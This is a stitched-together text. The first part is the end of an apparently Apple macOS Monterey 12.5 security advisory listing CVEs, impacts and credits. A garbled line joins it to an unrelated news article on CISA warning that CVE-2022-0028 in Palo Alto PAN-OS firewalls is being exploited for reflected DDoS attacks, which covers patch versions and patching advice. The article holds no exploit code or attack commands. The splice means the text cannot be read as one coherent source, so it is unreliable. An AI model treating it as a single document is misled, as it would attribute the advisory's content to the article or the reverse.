Description: This issue was addressed with improved checks.

CVE-2022-32801: Joshua Mason (@josh@jhu.edu)

**subversion**

Available for: macOS Monterey

Impact: Multiple issues in subversion

Description: Multiple issues were addressed by updating subversion.

CVE-2021-28544: Evgeny Kotkov, visualsvn.com

CVE-2022-24070: Evgeny Kotkov, visualsvn.com

CVE-2022-29046: Evgeny Kotkov, visualsvn.com

CVE-2022-29048: Evgeny Kotkov, visualsvn.com

**TCC**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: An access issue was addressed with improvements to the sandbox.

CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**WebKit**

Available for: macOS Monterey

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@\_manfp) working with Trend Micro Zero Day Initiative

**WebRTC**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution.

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

**Wi-Fi**

Available for: macOS Monterey

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32837: Wang Yu of Cyberserval

**Wi-Fi**

Available for: macOS Monterey

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

**Windows Server**

Available for: macOS Monterey

Impact: An app may be able to capture a user’s screen

Description: A logic issue was addressed with improved checks.

CVE-2022-32848: Jeremy Legendre of MacEnhance

CVE-2022-32793: About the security content of macOS Monterey 12.5

The bug tracked as CVE-2022-0028 allows attackers to hijack firewalls without authentication, in order to mount DDoS hits on their targets of choice.

The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that a high-severity security vulnerability in Palo Alto Networks firewalls is being actively exploited in the wild.

The bug (CVE-2022-0028, CVSS severity score of 8.6), exists in the PAN-OS operating system that runs the firewalls, and could allow a remote threat actor to abuse them to deploy distributed denial-of-service (DDoS) attacks against targets of their choice — without having to authenticate.

Two weeks since its disclosure, CISA said that it has now seen the bug being adopted by cyber adversaries in the wild, and it's added it to its Known Exploited Vulnerabilities (KEV) catalogue. Attackers can exploit the flaw to deploy both reflected and amplified versions of DDoS floods.

Exploitation of the issue can help attackers to cover their tracks and location, according to the original Palo Alto Networks advisory issued earlier this month.

"The DoS attack would appear to originate from a Palo Alto Networks PA-Series (hardware), VM-Series (virtual) and CN-Series (container) firewall against an attacker-specified target," according to the firm.

"The good news is that this vulnerability does not provide attackers with access to the victim's internal network," says Phil Neray, vice president of cyber-defense strategy at CardinalOps. "The bad news is that it can halt business-critical operations \[at other targets\] such as taking orders and handling customer service requests."

He notes that DDoS attacks aren't just mounted by small-time nuisance actors, as is often assumed: "DDoS has been used in the past by adversary groups like APT28 against the World Anti-Doping Agency."

The bug arises thanks to a URL-filtering policy misconfiguration, so instances that use a non-standard configuration are at risk. To be exploited, the firewall configuration "must have a URL filtering profile with one or more blocked categories assigned to a security rule with a source zone that has an external facing network interface," the advisory read.

**Exploited in the Wild**

Bud Broomhead, CEO at Viakoo, says bugs that can be marshaled into service to support DDoS attacks are in more and more demand by cybercriminals -- and are increasingly exploited.  

"The ability to use a Palo Alto Networks firewall to perform reflected and amplified attacks is part of an overall trend to use amplification to create massive DDoS attacks," he says. "Google's recent announcement of an attack which peaked at 46 million requests per second, and other record-breaking DDoS attacks will put more focus on systems that can be exploited to enable that level of amplification."

The speed of weaponization also fits the trend of cyberattackers taking increasingly less time to put newly disclosed vulnerabilities to work — but this also points to an increased interest in lesser-severity bugs on the part of threat actors.

"Too often, our researchers see organizations move to patch the highest-severity vulnerabilities first based on the CVSS," Terry Olaes, director of sales engineering at Skybox Security, wrote in an emailed statement. "Cybercriminals know this is how many companies handle their cybersecurity, so they've learned to take advantage of vulnerabilities seen as less critical to carry out their attacks."

But patch prioritization continues to be a challenge for organizations of all stripes and sizes thanks to the sheer number of patches that are disclosed in a given month — it totals hundreds of vulnerabilities that IT teams need to triage and assess, often without much guidance to go on. And furthermore Skybox Research Lab recently found that new vulnerabilities that went on to be exploited in the wild rose by 24% in 2022.

That said, "any vulnerability that CISA warns you about, if you have in your environment, you need to patch now," Roger Grimes, data-driven defense evangelist at KnowBe4, tells Dark Reading. "The \[KEV\] lists all the vulnerabilities that were used by any real-world attacker to attack any real-world target. Great service."

He notes that the list is exhaustive: "It isn't just full of Windows or Google Chrome exploits. I think the average computer security person would be surprised about what's on the list. It's full of devices, firmware patches, VPNs, DVRs, and a ton of stuff that isn't traditionally thought of as being highly targeted by hackers."

**Time to Patch & Monitor for Compromise**

For the newly exploited PAN-OS bug, patches are available in the following versions:

*   PAN-OS 8.1.23-h1
*   PAN-OS 9.0.16-h3
*   PAN-OS 9.1.14-h4
*   PAN-OS 10.0.11-h1
*   PAN-OS 10.1.6-h6
*   PAN-OS 10.2.2-h2
*   And all later PAN-OS versions for PA-Series, VM-Series and CN-Series firewalls.

To determine if the damage is already done, "organizations should ensure they have solutions in place capable of quantifying the business impact of cyber-risks into economic impact," Olaes wrote.

He added, "This will also help them identify and prioritize the most critical threats based on the size of financial impact, among other risk analyses such as exposure-based risk scores. They must also enhance the maturity of their vulnerability management programs to ensure they can quickly discover whether or not a vulnerability impacts them and how urgent it is to remediate."

Grimes notes that it's a good idea to subscribe to CISA's KEV emails as well.

"If you subscribe, you'll get at least an email a week, if not more, telling what the latest exploited vulnerabilities are," he says. "It isn't just a Palo Alto Networks problem. Not by any stretch of the imagination."

Tag

#dos